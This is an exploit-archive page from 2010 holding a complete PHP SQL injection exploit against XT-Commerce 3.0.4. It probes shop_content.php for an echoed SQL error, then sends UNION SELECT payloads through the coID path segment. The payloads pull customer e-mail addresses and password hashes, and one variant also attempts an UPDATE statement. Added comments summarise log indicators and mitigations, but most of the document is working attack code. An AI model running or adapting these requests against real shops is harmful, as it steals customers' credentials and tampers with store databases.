XT-Commerce Version 3.0.4 SQL Injection Exploit
Posted on 26 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>XT-Commerce Version 3.0.4 SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================
XT-Commerce Version 3.0.4 SQL Injection Exploit
===============================================
<?php
# Exploit Title: XT-Commerce
# Date: 25/7/2010
# Author: TA4G - S8T@hotmail.com
# Software Link: http://www.xt-commerce.info/index.php?_m=downloads&_a=viewdownload&downloaditemid=19
# Version: 3.0.4
# Google dork : n/a
# Platform / Tested on: Ubuntu Linux
# Category: webapps/0day
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Gr33tz to ### ArHack.NeT ###
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Reviewer summary (defensive reading of this listing):
#   * Affected surface: the coID path segment of shop_content.php. The listing
#     sends a quote character and SQL keywords in that segment, which implies the
#     value reaches a SQL statement without being validated as an integer.
#   * Data at risk: customers.customers_email_address and
#     customers.customers_password (the two columns named in the request strings).
#   * Precondition used by the script: the application returns the database
#     error text ("You have an error in your SQL syntax") to the client.
#   * Log / WAF indicators visible here: requests to shop_content.php/coID/
#     containing ' or %27, "union%20select", "customers_password" or
#     "content_manager"; on the response side, the SQL error text in the body,
#     or an "e-mail;hash;" pair inside the page <title>.
#   * Mitigation: bind or integer-cast coID before it is used in a query, turn
#     off display of database errors, and move to a vendor release that fixes
#     this (the page names no fixed version).
#   * All request strings below are reproduced exactly as printed on the page.

# Step 1: probe. Takes the base URL from the first command-line argument and
# requests coID "-1'" to see whether a SQL syntax error is echoed back.
$check_vuln = file_get_contents($argv[1]."shop_content.php/coID/-1'");
if(strpos($check_vuln,"You have an error in your SQL syntax") != false)
{
    print("Site is exploitable. ");
}
else
{
    # No error text in the response: fetch the base page only to decide which
    # message to print; both branches below exit without sending anything else.
    $getCont = file_get_contents($argv[1]);
    if(strpos($getCont,"xt:Commerce") == false)//Check if xt:commerce software
    {
        print("Copyright of software not found. ");
        print("Site is not exploitable. ");
        exit(0);
    }
    else
    {
        print("Site is not exploitable. ");
        print("Exploiting stopped. 
");
        exit(0);
    }
}

# Step 2: data request. A UNION SELECT in the coID segment asks for one row of
# e-mail address and password hash from the customers table, joined with 0x3b
# (";") so the two values can be split apart later.
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%20% 271");
# Each of the next two requests is sent only when the previous response still
# contains the SQL error text; they are variants of the same request.
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
    $innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 20200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D% 20%271");
}
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
    $innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 200%2C1%3B--%20UPDATE%20content_manager%20SET%20languages_id%20%3D%20%272%27% 20where%205%3D%271");
}

//split of return
# Step 3: read the result out of the response. The text between <title> and
# </title> is taken, so the queried value is expected to be rendered in the
# page title by shop_content.php.
$innerTitle = substr($innerHTML,strpos($innerHTML,"<title>")+7,(strpos($innerHTML,"</title>")-(strpos ($innerHTML,"<title>")+7)));
if(strpos($innerTitle,";") != false)
{
    # Text before the first ";" is printed as the username (the e-mail address
    # column); text between the first and second ";" is the password column.
    $innerUser = substr($innerTitle,0,strpos($innerTitle,";"));
    $innerMD5 = substr($innerTitle,strpos($innerTitle,";")+1,strlen($innerTitle));
    $innerMD5 = substr($innerMD5,0,strpos($innerMD5,";"));
    print("Username: ");
    print($innerUser." ");
    # A 32-character value is labelled MD5 on length alone.
    # NOTE(review): this suggests the shop stores plain MD5 password hashes;
    # confirm against the deployment. If so, treat any disclosed hash as a
    # compromised credential: force resets and migrate to a salted, slow hash
    # such as PHP's password_hash().
    if(strlen($innerMD5)==32)
    {
        print("Hash is MD5: ");
        print($innerMD5." ");
    }
    else
    {
        print("Is not MD5: ");
        print($innerMD5." ");
    }
}
else
{
    print("Error, stop executing. ");
}
?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>